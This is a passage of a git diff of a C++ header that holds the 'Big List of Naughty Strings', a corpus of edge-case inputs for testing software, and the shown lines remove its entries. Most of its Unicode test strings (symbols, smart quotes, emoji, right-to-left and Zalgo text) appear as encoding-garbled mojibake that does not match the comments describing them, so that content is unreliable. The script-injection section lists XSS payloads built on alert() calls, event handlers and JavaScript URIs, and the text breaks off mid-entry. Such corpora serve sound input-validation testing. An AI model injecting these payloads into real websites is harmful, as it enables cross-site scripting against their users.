diff options
Diffstat (limited to 'include/big_list_of_naughty_strings.hpp')
-rw-r--r-- | include/big_list_of_naughty_strings.hpp | 1149 |
1 files changed, 463 insertions, 686 deletions
diff --git a/include/big_list_of_naughty_strings.hpp b/include/big_list_of_naughty_strings.hpp index 4ba27f73e4..2d1ca0dd74 100644 --- a/include/big_list_of_naughty_strings.hpp +++ b/include/big_list_of_naughty_strings.hpp @@ -1,687 +1,464 @@ const std::string naughty_strings[] = { -// sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt - -// Reserved Strings -// -// Strings which may be used elsewhere in code - -"undefined", -"undef", -"null", -"NULL", -"(null)", -"nil", -"NIL", -"true", -"false", -"True", -"False", -"TRUE", -"FALSE", -"None", -"hasOwnProperty", -"\\", -"\\\\", - -// Numeric Strings -// -// Strings which can be interpreted as numeric - -"0", -"1", -"1.00", -"$1.00", -"1/2", -"1E2", -"1E02", -"1E+02", -"-1", -"-1.00", -"-$1.00", -"-1/2", -"-1E2", -"-1E02", -"-1E+02", -"1/0", -"0/0", -"-2147483648/-1", -"-9223372036854775808/-1", -"-0", -"-0.0", -"+0", -"+0.0", -"0.00", -"0..0", -".", -"0.0.0", -"0,00", -"0,,0", -",", -"0,0,0", -"0.0/0", -"1.0/0.0", -"0.0/0.0", -"1,0/0,0", -"0,0/0,0", -"--1", -"-", -"-.", -"-,", -"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999", -"NaN", -"Infinity", -"-Infinity", -"INF", -"1#INF", -"-1#IND", -"1#QNAN", -"1#SNAN", -"1#IND", -"0x0", -"0xffffffff", -"0xffffffffffffffff", -"0xabad1dea", -"123456789012345678901234567890123456789", -"1,000.00", -"1 000.00", -"1'000.00", -"1,000,000.00", -"1 000 000.00", -"1'000'000.00", -"1.000,00", -"1 000,00", -"1'000,00", -"1.000.000,00", -"1 000 000,00", -"1'000'000,00", -"01000", -"08", -"09", -"2.2250738585072011e-308", - -// Special Characters -// -// ASCII punctuation. All of these characters may need to be escaped in some -// contexts. Divided into three groups based on (US-layout) keyboard position. - -",./;'[]\\-=", -"<>?:\"{}|_+", -"!@#$%^&*()`~", - -// Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, -// and U+007F (DEL) -// Often forbidden to appear in various text-based file formats (e.g. XML), -// or reused for internal delimiters on the theory that they should never -// appear in input. -// The next line may appear to be blank or mojibake in some viewers. -"", - -// Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. -// Commonly misinterpreted as additional graphic characters. -// The next line may appear to be blank, mojibake, or dingbats in some viewers. -"ᅡタᅡチᅡツᅡテᅡトᅡニᅡヌᅡネᅡノᅡハᅡヒᅡフᅡヘᅡホᅡマᅡミᅡムᅡメᅡモᅡヤᅡユᅡヨᅡラᅡリᅡルᅡレᅡロᅡワᅡンᅡ゙ᅡ゚", - -// Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode -// version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), -// and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often -// treated as whitespace in some contexts. -// This file unfortunately cannot express strings containing -// U+0000, U+000A, or U+000D (NUL, LF, CR). -// The next line may appear to be blank or mojibake in some viewers. -// The next line may be flagged for \"trailing whitespace\" in some viewers. -" "," ᅡナ £レタ¬タタ¬タチ¬タツ¬タテ¬タト¬タナ¬タニ¬タヌ¬タネ¬タノ¬タハ¬タヒ¬タᄄ¬タᄅ¬タᆵ¬チ゚ ̄タタ", - -// Unicode additional control characters: all of the characters with -// general category Cf (in Unicode 8.0.0). -// The next line may appear to be blank or mojibake in some viewers. -"ᅡᆳタチツテトナワᅴンᅵマ£ᅠホ¬タヒ¬タフ¬タヘ¬タホ¬タマ¬タᆰ¬タᆱ¬タᆲ¬タᆳ¬タᆴ¬チᅠ¬チᄀ¬チᄁ¬チᆪ¬チᄂ¬チᆭ¬チᄃ¬チᄄ¬チᄅ¬チᆰ¬チᆱ¬チᆲ¬チᆳ¬チᆴ¬チᆵᄏᄍᄎᄏムツᄑロᄇᅠロᄇᄀロᄇᄁロᄇᆪンナᄈンナᄡンナᄉンナᄊンナᄋンナᄌンナᄍンナᄎᅠタチᅠタᅠᅠタᄀᅠタᄁᅠタᆪᅠタᄂᅠタᆬᅠタᆭᅠタᄃᅠタᄄᅠタᄅᅠタᆰᅠタᆱᅠタᆲᅠタᆳᅠタᆴᅠタᆵᅠタᄚᅠタᄆᅠタᄇᅠタᄈᅠタᄡᅠタᄉᅠタᄊᅠタᄋᅠタᄌᅠタᄍᅠタᄎᅠタᄏᅠタᄐᅠタᄑᅠタᄒᅠタᅠチタᅠチチᅠチツᅠチテᅠチトᅠチナᅠチニᅠチヌᅠチネᅠチノᅠチハᅠチヒᅠチフᅠチヘᅠチホᅠチマᅠチミᅠチムᅠチメᅠチモᅠチヤᅠチユᅠチヨᅠチラᅠチリᅠチルᅠチレᅠチロᅠチワᅠチンᅠヂᅠチ゚ᅠチᅠᅠチᄀᅠチᄁᅠチᆪᅠチᄂᅠチᆬᅠチᆭᅠチᄃᅠチᄄᅠチᄅᅠチᆰᅠチᆱᅠチᆲᅠチᆳᅠチᆴᅠチᆵᅠチᄚᅠチᄆᅠチᄇᅠチᄈᅠチᄡᅠチᄉᅠチᄊᅠチᄋᅠチᄌᅠチᄍᅠチᄎᅠチᄏᅠチᄐᅠチᄑᅠチᄒᅠチ", - -// \"Byte order marks\", U+FEFF and U+FFFE, each on its own line. -// The next two lines may appear to be blank or mojibake in some viewers. -"ᄏ", -"ᄒ", - -// Unicode Symbols -// -// Strings which contain common unicode symbols (e.g. smart quotes) - -"ᅫᄅ¬ノネᅢᄃ¬ネレ¬ネᆱᅨワᅡᄉ¬ノᄂ¬ノᆬᅢᄋ", -"ᅢᆬᅢ゚¬ネツᅥメᅡ례ル¬ネニᅨレᅡᆲ¬タᆭᅢᆭ", -"ᅤモ¬ネムᅡᄡᅡᆴ¬タᅠᅡᆬᅡ뗴ニᅢ죄タ¬タワ¬タリ", -"ᅡᄀ¬ト깏ᅡᄁ¬ネ゙ᅡ다ᄊ¬タ깕ᅡᄎ¬タモ¬ノᅠ", -"ᅡ졔ロᅢヌ¬ラハᅣ몌ワᅢツᅡᆵᅨリᅡ", -"ᅢナᅢヘᅢホᅢマᅨンᅢモᅢヤᆪᅢメᅢレᅢニ¬リテ", -"ᅤメ¬ダᅡᄡ¬タᄚᅨヌᅢチᅡ뗴ニᅢリ¬ネマ¬タン¬タル", -"`¬チト¬ツᆲ¬タᄍ¬タᄎᆲチᆲツ¬タ가ᄚᅡᄋ¬タレ¬タヤᅡᄆ", -"¬ナロ¬ナワ¬ナン¬ナ゙", -"チツテトナニヌネノハヒフヘホマミムメモヤユヨラリルレロワン゙゚ᅠᄀᄁᆪᄂᆬᆭᄃᄄᄅᆰᆱᆲᆳᆴᆵᄚᄆᄇᄈᄡᄉᄊᄋᄌᄍᄎᄏᄐᄑᄒタチツテトナニヌネノハヒフヘホマ", -"ᅠᄀᄁᆪᄂᆬᆭᄃᄄᄅ", - -// Unicode Subscript/Superscript/Accents -// -// Strings which contain unicode subscripts/superscripts; can cause rendering issues - -"¬チᄚ¬チᄡ¬チᄉ", -"¬ツタ¬ツチ¬ツツ", -"¬チᄚ¬チᄡ¬チᄉ¬ツタ¬ツチ¬ツツ", -"¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ ¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ ¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ", - -// Quotation Marks -// -// Strings which contain misplaced quotation marks; can cause encoding errors - -"'", -"\"", -"''", -"\"\"", -"'\"'", -"\"''''\"'\"", -"\"'\"'\"''''\"", -"<foo val=¬タワbar¬タン />", -"<foo val=¬タワbar¬タン />", -"<foo val=¬タンbar¬タワ />", -"<foo val=`bar' />", - -// Two-Byte Characters -// -// Strings which contain two-byte characters: can cause rendering issues or character-length issues - -"ヤᄚ¦ᄌᆳ ̄チユ ̄ツモ ̄チᆱ ̄チツ ̄チメ ̄チᆭ¦ᄌヒ ̄チユ ̄チト", -" ̄テム ̄テᄐ ̄テニ ̄ツᆪ ̄テᄐ ̄チᄌ│ᄀフ ̄チヒ ̄チᆰ ̄チト ̄チヒ", -"¥メフ│ᆪᄑ₩ᄐᄁ│ᆰ゙", -"←テᄄ│ミᄑ₩ᅠᄐ", -"↓ツᆲ■レフ↑ᄈᄐ■ユル↓ロミ ↓ヨᄡ■ユル↓ラᄚ↑ᄉᆲ↓ニフ", -"↓ᄚᆭ↓ᄚᄄ→ᆬᄐ ■テタ↑ᄈᅠ ↓リᄄ ■ホᄇ↓ヒワ→ᄃᄄ↑ᄈᄐ ↓ムロ→ヒᄂ→ᆭᆲ →リᅠ→ᄚᄅ↑ᄚチ■ユリ", -"ᄂᄒ₩ワテᄃム¥ᆳᄌ←ルᄁ│ᆰ゙¥ᆳᄌᅠヤᄅᄊ₩ノタ", -"↓レᄌ→゙タ→ᄚヤ■ニᅠ→ᆬᄡ", -"ᅠワホᅠワᄆᅠンᄍᅠᄆモᅠᄆᄌᅠᄇヨᅠᄈマ", - -// Changing length when lowercased -// -// Characters which increase in length (2 to 3 bytes) when lowercased -// Credit: https://twitter.com/jifa/status/625776454479970304 - -"ᄎ", -"ᄒ", - -// Japanese Emoticons -// -// Strings which consists of Japanese-style emoticons which are popular on the web - -" ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ  ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ", -"(ᄑᄀ¬ラユ ¬ネタ ¬ラユᄑᄀ)", -"ᄑタᄑᄄ(ᅡᄡ¬ネタᄑタ¬ネᄅ", -"__ᄒロ(,_,*)", -" ̄テᄏ(ᆪ¬ネタᆪ) ̄テᄏ:*:", -"ᄒ゚ᄑᆬ¬ワ ̄テᄒ¬ユᄇ(ᄑᄀ¬ラユ¬タ¬ラユᄑᄀ)¬ユᄆ¬ワᄑᆬᄒ゚", -", ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル( ¬リᄏ ᅬノ ¬リᄏ ) ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル", -"(¬ユᆵᅡᄚ¬ヨ가ᄚᄐノ¬ユᆵᄌᄉ ¬ヤᄏ¬ヤチ¬ヤᄏ)", -"(ᄒノ¢ᄇᆬロハ¢ᄇᆬᄐノᄒノᄏ ¬ヤᄏ¬ヤチ¬ヤᄏ", -"¬ヤᆲ¬ヤタ¬ヤᆲ ̄テホ( ᅡᄎ _ ᅡᄎ ̄テホ)", -"( ᅪ가ᄚ ᅪワᅧヨ ᅪ가ᄚ)", - -// Emoji -// -// Strings which contain Emoji; should be the same behavior as two-byte characters, but not always - -"゚リヘ", -"゚ムᄅ゚マᄑ", -"゚ムᄒ ゚ルヌ ゚メチ ゚ルナ ゚ルニ ゚ルヒ ゚ルホ ゚ルヘ", -"゚ミᄉ ゚ルネ ゚ルノ ゚ルハ", -"¬ンᄂᄌマ ゚メヤ ゚メフ ゚メユ ゚メ゙ ゚メモ ゚メラ ゚メヨ ゚メリ ゚メン ゚メ゚ ゚メワ ゚メロ ゚メレ ゚メル", -"¬ワピマ ゚メᆰ゚マ ゚ムミ゚マ ゚ルプマ ゚ムマ゚マ ゚ルマ゚マ", -"゚レᄒ ゚ニメ ゚ニモ ゚ニユ ゚ニヨ ゚ニラ ゚ニル ゚マᄃ", -"0ᄌマ¬テᆪ 1ᄌマ¬テᆪ 2ᄌマ¬テᆪ 3ᄌマ¬テᆪ 4ᄌマ¬テᆪ 5ᄌマ¬テᆪ 6ᄌマ¬テᆪ 7ᄌマ¬テᆪ 8ᄌマ¬テᆪ 9ᄌマ¬テᆪ ゚ヤ゚", - -// Regional Indicator Symbols -// -// Regional Indicator Symbols can be displayed differently across -// fonts, and have a number of special behaviors - -"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ゚ヌᄌ", -"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ", -"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ", - -// Unicode Numbers -// -// Strings which contain unicode numbers; if the code is localized, it should see the input as numeric - -"ᄐムᄐメᄐモ", -"ᄀᄁᆪ", - -// Right-To-Left Strings -// -// Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) - -"ᆱナ ニチᄈ ᄈツᄋᆰ ネᄄᄃトᆰᆳᆵハᆵフ, ᆲᄇハᄆᆰハ ᄄᄃᄈᆰᆴᆵᄃナ ᆪニ ᆵニネ. ᆬᄚ ヌニᄃ゚ ᄃトᄈᆰᄃᄆ ネᆰニᄉハᄄ テᄃニ. ᆪヌムト ᄃハᄋᄃトハᄃフ ᄄᄆハᄋᄃニハᄃ-チᄆニᄈᄃ ツᆵ ᆪᆴᄚ. ᄈトハナᄃニフ ᆬᆰチᄃツハᄅ ᄄハニ ナᄃ, ハᄚテᄆ ᄃトᆳᆵネᆵ ᆪハ ᄄᄍᆵ, ナᄍᄃナトᄅ ᄄネトニᆵᄃフ ᄃトᆬᄋトᄃツ ᄍト ᆬハネ.", -"ᅲムᅱᄚᅱ튜뛰슈ミᅲ뤼ᄡᅲチᅲルᅲᆰ, ᅲムᅱ쥐튜뛰쥬ミ ᅲミᅱ뮤ワᅱ쮸ヤᅱᄡᅲルᅲン, ᅲミᅱ슑 ᅲヤᅱ유뤼쥐튜チᅲ゙ᅱ유ルᅱᄡᅲン, ᅲユᅱᄚᅲミᅱ슑 ᅲヤᅱ쥬ミᅱ쥬뛰쓙", -"ᅲヤᅱ쥬ルᅱᄚᅲᆰᅱ쥬ヤtestᄃトᄉチᆳᄃᆰ ᄃトᆰムᆳネト", -"ᄋᄑ", -"ᄋᄎ", -"ナマニホᄃツホᄡホᄅマ ᄈマᄄマトミ ᄃミᄈメᆰミᆴメᆵホᄃナミ ᄃトトムマᄎホᄅミ チミハ ᄃトニムマᄌマナミ ᄃトメツホᄃᆭミナホᄅミ ネホチミハナ ハホᆴマᄉムホ ᄃトᆰムホᄋメᄄミハツホᄃᆰマ ᄃトメᆳᄃᄈマネᄄミハムホᄅマフ ", - -// Trick Unicode -// -// Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) - -"¬タᆰ¬タᆰtest¬タᆰ", -"¬タᆱtest¬タᆱ", -"¬タᄅtest¬タᄅ", -"test¬チᅠtest¬タᆱ", -"¬チᆭtest¬チᄃ", - -// Zalgo Text -// -// Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) - -"£ᄍᄚᅩ초초ユoᅪ゙ ᅩᄋiᅩ볿ᅪヌᅩᆰᅪルnᅩンᅩラᅪユvᅩ゚ᅩワᅩリᅩᆭᅪ゚oᅩ쏘ルᅩᄚᅩᅠkᅢ똬レᅩᆴᅩ촑ᅩ쪼모ᄂ ᅩヨtᅩンᅪユᅩ뽃ᅩ콝ᅪ゙hᅩ톼モᅩ볺ᅩ뽀リᅩᄇeᅪヌᅩᆪᅩᄚᅩᆭᅩᆲᅪホ ᅩ꼬토코모リhᅪレᅪホᅪルᅩワᅩᆪᅩ봐ナiᅩᆭᅩ볷ᅩᄚᅩᄂvᅩ콰ヘeᅩ촔ᅩ뽉ᅩᄚ-mᅩᄁiᅪナnᅩヨᅩ초゙ᅩ봂ᅩᄚdᅩ소토゚ᅪルᅩ로토リᅩᄈ ᅩ゙ᅩᆬᅩ모뽌rᅩロᅩラᅩリeᅪルpᅪᅠrᅩ토゙ᅩ콠ᅩラeᅩ초ᅠᅩᆪᅪ゚sᅩリᅪヌᅩ뽜ヘᅩンᅪノeᅪノᅩᆬᅩᆵᅩ゙ᅩ봐レᅩᆲᅪワᅦ쫇ᅪホᅪホᅩ゚ᅩヨᅪヌᅩᄂtᅪヘᅩᆲᅩ놔モᅩ톬ᅪリᅪナiᅩᆰᅩᄆnᅪᅠgᅩᄡᅪノ ᅪマᅪノᅪナcᅩᆲᅩ゚hᅪᄀaᅩᆱᅩ콢ᅪリoᅩᆱᅩ゚ᅩヨᅪヘᅩルᅩンᅪノsᅩラᅩᆭᅩᄇ.ᅩ또쫘ネᅩᆪ", -"ᅩ과モᅩ゙ᅪナIᅩラᅩリᅩᆭᅪンnᅪヌᅪヌᅪルvᅩᆴᅩᆱokᅩ볾ᅩルᅪネiᅩヨᅪルᅩᆳᅩ쪼ᅠᅩ゙nᅩ고콡ᅩᆪᅩᄎgᅩ봐ネᅪルᅩᆳᅪルᅩᆲᅪホ ᅩᄚtᅪヤᅩᆭhᅩ゙ᅩᄇeᅩ꼬ᄂ ᅪヘᅩᆲᅩ봐ヨfᅩᄡᅩリᅪユᅩᆪᅢ똬ヨ£ᄎ쫁ᅩᄅlᅪヨᅪヤᅪレiᅪモᅪレᅩᆭᅪᅠnᅪヨᅪヘᅩラᅪモᅩ뽍gᅪヘ ᅩᄄoᅪレᅩᆰᅪᄀfᅩリᅩᆪᅩᆲ ᅩヨᅩリᅪヨᅩ゚ᅪルᅩᆴcᅭノᅪヤᅩᆱᅪヨᅪモᅪヌᅪヨᅪナhᅩ소녻ᅪレᅪヤᅢ고ラᅩ톼ユᅪナoᅩ톣ᅩᆬsᅩ뫄ネᅩ초ヨᅩᆭᅩ콰ᄁ.ᅩロᅩヨᅩ゙ᅩᅠᅩᆱᅩᄚ", -"ᅩラᅩ촤ヨᅩ쫊ᅪモ£ᄍᆴᅩ놔ヘᅩᆬᅪヌᅪネhᅩ보チeᅪマᅪモᅩ토ラᅩルᅩ톣ᅪヤ ᅪヌᅩワᅩ모ᅠᅪモᅪヘᅪナNᅪユᅪᅠeᅩラᅩᄆzᅩリᅩンᅩワᅩ촤ルpᅩ노초쫘ヘᅩᆵᅪレeᅩᅠᅩ코ᅠᅪワrᅩ또놔ヘᅩ초ヨᅪヤᅩヨᅩヨdᅩᅠᅩ゚ᅩᆳᅩᆲᅩンᅪ゚iᅩᆭᅪヨᅩ롸モᅪヤᅩᄂaᅩᅠᅩラᅩᆲᅪノᅩルnᅪレᅪワ ᅩ코゙ᅩᄚᅪレᅪナhᅩ솨ノiᅩ뽀゙vᅩ꽈ヌ£ᄌルᅪホᅪ゚-ᅭノᅩᆳᅩ로톼ヤmᅩ놄ᅩᆱiᅪユᅪヌᅩンᅩᆭnᅩラᅪル£ᄌヘᅩ゚ ᅩᆵᅩ봐ユᅪ゙ᅦᆱᅩ゚ᅩᆵᅩᄚᅩ봐ルᅩ코ンf ᅩᆰᅩᄚᅩᄚᅩラᅩヨᅩᆳᅩリᅪリcᅩᆭᅪヘᅩ보゙ᅪヘᅩ로ル£ᄌᆬᅪレaᅩᆴᅪホᅩ゚ᅩルᅪワᅥ고로쫘ホsᅩᄂ.ᅩンᅩン ᅭノZᅩ고ヨᅩワᅪヨᅩᄚᅩᆪᅪノᅩワaᅪヨᅩᄚᅪルᅩᆲᅪᄀlᅩ볾ᅩ뽜ヘᅩᄅgᅩ고゚ᅩ토뫄レᅩ゙ᅩᆲᅪナoᅩラᅪワ.ᅩ゚", -"ᅩᆭHᅩᆲᅩ노ラᅩ놔ンeᅪワ ᅩワᅩᆬᅩンᅩ콰ヘᅩ゚ᅩチwᅩユhᅩヨᅩᆵᅪモoᅩンᅪルᅩヨᅪホᅩ몵 ᅭノᅩ초ルᅩ゙ᅩ゚ᅪネWᅩ오톬aᅩ촑ᅪヘᅣᆵᅪネᅪユᅩᆳᅪルᅩᆵᅩワtᅩ쏘톭sᅩリᅪルᅪヨᅩユ ᅩᅠᅩᆱᅩᅠBᅩ콰ヘᅪルᅪノᅩ뽜ナeᅩᄉhᅩ솗ᅪヌᅩᆱᅪルiᅩ쫘モᅩ뽀뽍ᅪホᅩᆱᅩユnᅪ゚dᅩᄡᅩᆰᅩワᅩヨ ᅩᄚᅪノᅩ롸ヌᅪルᅩ봐゙ᅪナTᅪヨᅩ톼モᅩᆰᅪᄁhᅪマᅪモᅩᆴᅩᄏeᅩᆲᅩンᅩ゚ᅪナ ᅩ노쪼ンWᅪルᅩ゙ᅩンᅪヤᅪヌᅪンᅪナaᅪマᅪモᅪヤᅩ쪼톣lᅩᄡᅪヤᅩᄚᅩ노゚ᅪヤ£ᄌ폶.ᅪユ", -"Zᅩᆴᅩ゙ᅩᅠᅪルᅪヤᅪナ£ᄌタᅩラᅩ゙ᅪネᅩ코ラ£ᄌ쏴ルᅪホᅩᆵᅩ쪼゙ᅪモGᅩᄏOᅩᆳᅩラᅩᆴ", - -// Unicode Upsidedown -// -// Strings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com) - -"ᅨルミnb£ᄡノlミ ミuᅥテミᆵ ᅦンᄍolop ᅧヌᅦン ᅦンᄍoqミl ᅧヌn ᅧヌunp£ᄡノp£ᄡノヤu£ᄡノ ᄍodᆵᅦンᅧヌ poᆵsn£ᄡノᅦン op pᅦンs 'ᅧヌ£ᄡノlᅦン ᅥテu£ᄡノヤs£ᄡノd£ᄡノpミ ᄍnᅧヌᅦンᅧヌヤᅦンsuoヤ 'ᅧヌᅦンᆵミ ᅧヌ£ᄡノs ᄍolop ᆵnsd£ᄡノ ᆵᅦンᄍoᅨᆬ", -"00ᅨルᅥヨ$-", - -// Unicode font -// -// Strings which contain bold/italic/etc. versions of normal characters - -"ᄐᄡᄑネᄑナ ᄑムᄑユᄑノᄑテᄑヒ ᄑツᄑメᄑマᄑラᄑホ ᄑニᄑマᄑリ ᄑハᄑユᄑヘᄑミᄑモ ᄑマᄑヨᄑナᄑメ ᄑヤᄑネᄑナ ᄑフᄑチᄑレᄑル ᄑトᄑマᄑヌ", -"ンミモンミᄀンミ゙ ンミᆰンミᆴンミᄁンミワンミᄂ ンミロンミᆱンミᄄンミᄚンミᄃ ンミ゚ンミᄄンミᄆ ンミᆪンミᆴンミᆭンミᄅンミᆲ ンミᄄンミᆵンミ゙ンミᆱ ンミᆳンミᄀンミ゙ ンミᆬンミレンミᄈンミᄇ ンミンンミᄄンミᅠ", -"ンユンヨヘンヨハ ンヨヨンヨレンヨホンヨネンヨミ ンヨヌンヨランヨヤンヨワンヨモ ンヨヒンヨヤンヨン ンヨマンヨレンヨメンヨユンヨリ ンヨヤンヨロンヨハンヨラ ンヨルンヨヘンヨハ ンヨムンヨニンヨ゚ンヨ゙ ンヨノンヨヤンヨフ", -"ンムᄏンメノンメニ ンメメンメヨンメハンメトンメフ ンメテンメモンメミンメリンメマ ンメヌンメミンメル ンメヒンメヨンメホンメムンメヤ ンメミンメランメニンメモ ンメユンメノンメニ ンメヘンメツンメロンメレ ンメナンメミンメネ", -"ンモᆪンモᄆンモᆴ ンモᄎンモᄒンモᄇンモᆲンモᄡ ンモᆱンモᄏンモᄌンヤタンモᄋ ンモᆵンモᄌンヤチ ンモᄈンモᄒンモᄊンモᄍンモᄐ ンモᄌンモンモᆴンモᄏ ンモᄑンモᄆンモᆴ ンモᄉンモᆰンヤテンヤツ ンモᆳンモᄌンモᄚ", -"ンユヒンユルンユヨ ンユᄁンユᆭンユレンユヤンユワ ンユモンユᆪンユᅠンユᄄンユ゚ ンユランユᅠンユᄅ ンユロンユᆭンユ゙ンユᄀンユᄂ ンユᅠンユᄃンユヨンユᆪ ンユᆬンユルンユヨ ンユンンユメンユᆱンユᆰ ンユユンユᅠンユリ", -"ンレテンレムンレホ ンレレンレ゙ンレメンレフンレヤ ンレヒンレロンレリンレᅠンレラ ンレマンレリンレᄀ ンレモンレ゙ンレヨンレルンレワ ンレリンレ゚ンレホンレロ ンレンンレムンレホ ンレユンレハンレᆪンレᄁ ンレヘンレリンレミ", -"¬メᆵ¬メᆪ¬メᅠ ¬メᆲ¬メᄚ¬メᄂ¬メ゙¬メᆭ ¬メン¬メᆳ¬メᆰ¬メᄇ¬メᄅ ¬メᄀ¬メᆰ¬メᄈ ¬メᆬ¬メᄚ¬メᄄ¬メᆱ¬メᆴ ¬メᆰ¬メᄆ¬メᅠ¬メᆳ ¬メᆵ¬メᆪ¬メᅠ ¬メᄃ¬メワ¬メᄉ¬メᄡ ¬メ゚¬メᆰ¬メᄁ", - -// Script Injection -// -// Strings which attempt to invoke a benign script injection; shows vulnerability to XSS - -"<script>alert(123)</script>", -"<script>alert('123');</script>", -"<img src=x onerror=alert(123) />", -"<svg><script>123<1>alert(123)</script>", -"\"><script>alert(123)</script>", -"'><script>alert(123)</script>", -"><script>alert(123)</script>", -"</script><script>alert(123)</script>", -"< / script >< script >alert(123)< / script >", -" onfocus=JaVaSCript:alert(123) autofocus", -"\" onfocus=JaVaSCript:alert(123) autofocus", -"' onfocus=JaVaSCript:alert(123) autofocus", -"ᄐワscriptᄐ゙alert(123)ᄐワ/scriptᄐ゙", -"<sc<script>ript>alert(123)</sc</script>ript>", -"--><script>alert(123)</script>", -"\";alert(123);t=\"", -"';alert(123);t='", -"JavaSCript:alert(123)", -";alert(123);", -"src=JaVaSCript:prompt(132)", -"\"><script>alert(123);</script x=\"", -"'><script>alert(123);</script x='", -"><script>alert(123);</script x=", -"\" autofocus onkeyup=\"javascript:alert(123)", -"' autofocus 